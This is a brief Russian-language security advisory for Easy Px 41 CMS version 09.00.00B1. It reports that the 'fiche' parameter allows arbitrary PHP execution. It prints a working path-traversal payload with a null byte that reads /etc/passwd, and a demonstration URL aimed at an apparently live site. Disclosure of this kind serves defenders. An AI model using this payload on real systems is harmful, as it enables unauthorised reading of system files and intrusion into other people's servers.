Программа: Easy Px 41 CMS 09.00.00B1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «fiche». Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
/[path]/?view=LivreDor&fiche=../../../../../../../../etc/passwd%00
Демонстрация:
http://www.epx41.be/?view=LivreDor&fiche=../../../../../../../../etc/passwd%00
